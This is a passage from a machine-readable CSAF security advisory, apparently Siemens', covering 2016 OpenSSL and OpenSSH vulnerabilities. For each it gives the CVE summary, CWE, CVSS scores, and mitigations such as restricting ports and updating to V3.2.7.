recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 3.7, "baseSeverity": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-0701" }, { "cve": "CVE-2016-0702", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "notes": [ { "category": "summary", "text": "The MOD_EXP_CTIME_COPY_FROM_PREBUF function in crypto/bn/bn_exp.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g does not properly consider cache-bank access times during modular exponentiation, which makes it easier for local users to discover RSA keys by running a crafted application on the same Intel Sandy Bridge CPU core as a victim and leveraging cache-bank conflicts, aka a \"CacheBleed\" attack.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0702" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.1, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-0702" }, { "cve": "CVE-2016-0703", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "notes": [ { "category": "summary", "text": "The get_client_master_key function in s2_srvr.c in the SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a accepts a nonzero CLIENT-MASTER-KEY CLEAR-KEY-LENGTH value for an arbitrary cipher, which allows man-in-the-middle attackers to determine the MASTER-KEY value and decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, a related issue to CVE-2016-0800.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0703" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.9, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-0703" }, { "cve": "CVE-2016-0704", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "notes": [ { "category": "summary", "text": "An oracle protection mechanism in the get_client_master_key function in s2_srvr.c in the SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a overwrites incorrect MASTER-KEY bytes during use of export cipher suites, which makes it easier for remote attackers to decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, a related issue to CVE-2016-0800.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0704" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.9, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-0704" }, { "cve": "CVE-2016-0705", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "notes": [ { "category": "summary", "text": "Double free vulnerability in the dsa_priv_decode function in crypto/dsa/dsa_ameth.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a malformed DSA private key.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0705" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 9.8, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-0705" }, { "cve": "CVE-2016-0777", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "notes": [ { "category": "summary", "text": "The resend_bytes function in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2 allows remote servers to obtain sensitive information from process memory by requesting transmission of an entire buffer, as demonstrated by reading a private key.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0777" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 6.5, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-0777" }, { "cve": "CVE-2016-0778", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "notes": [ { "category": "summary", "text": "The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0778" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 8.1, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-0778" }, { "cve": "CVE-2016-0797", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "notes": [ { "category": "summary", "text": "Multiple integer overflows in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g allow remote attackers to cause a denial of service (heap memory corruption or NULL pointer dereference) or possibly have unspecified other impact via a long digit string that is mishandled by the (1) BN_dec2bn or (2) BN_hex2bn function, related to crypto/bn/bn.h and crypto/bn/bn_print.c.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0797" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-0797" }, { "cve": "CVE-2016-0798", "cwe": { "id": "CWE-401", "name": "Missing Release of Memory after Effective Lifetime" }, "notes": [ { "category": "summary", "text": "Memory leak in the SRP_VBASE_get_by_user implementation in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g allows remote attackers to cause a denial of service (memory consumption) by providing an invalid username in a connection attempt, related to apps/s_server.c and crypto/srp/srp_vfy.c.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0798" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-0798" }, { "cve": "CVE-2016-0799", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "notes": [ { "category": "summary", "text": "The fmtstr function in crypto/bio/b_print.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g improperly calculates string lengths, which allows remote attackers to cause a denial of service (overflow and out-of-bounds read) or possibly have unspecified other impact via a long string, as demonstrated by a large amount of ASN.1 data, a different vulnerability than CVE-2016-2842.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0799" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 9.8, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-0799" }, { "cve": "CVE-2016-0800", "cwe": { "id": "CWE-787", "name": "Out-of-bounds Write" }, "notes": [ { "category": "summary", "text": "A cross-protocol attack was discovered that could allow an attacker to decrypt intercepted TLS sessions by using a server supporting SSLv2 as a Bleichenbacher RSA padding oracle.\nIn order to exploit the vulnerability, the attacker must have network access to the affected devices and must be in a privileged network position.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0800" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 4.0, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-0800" }, { "cve": "CVE-2016-1907", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "notes": [ { "category": "summary", "text": "The ssh_packet_read_poll2 function in packet.c in OpenSSH before 7.1p2 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via crafted network traffic.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1907" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-1907" }, { "cve": "CVE-2016-1908", "cwe": { "id": "CWE-287", "name": "Improper Authentication" }, "notes": [ { "category": "summary", "text": "The client in OpenSSH before 7.2 mishandles failed cookie generation for untrusted X11 forwarding and relies on the local X11 server for access-control decisions, which allows remote X11 clients to trigger a fallback and obtain trusted X11 forwarding privileges by leveraging configuration issues on this X11 server, as demonstrated by lack of the SECURITY extension on this X11 server.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1908" }, { "category": "external", "summary": "www.first.org", "url": 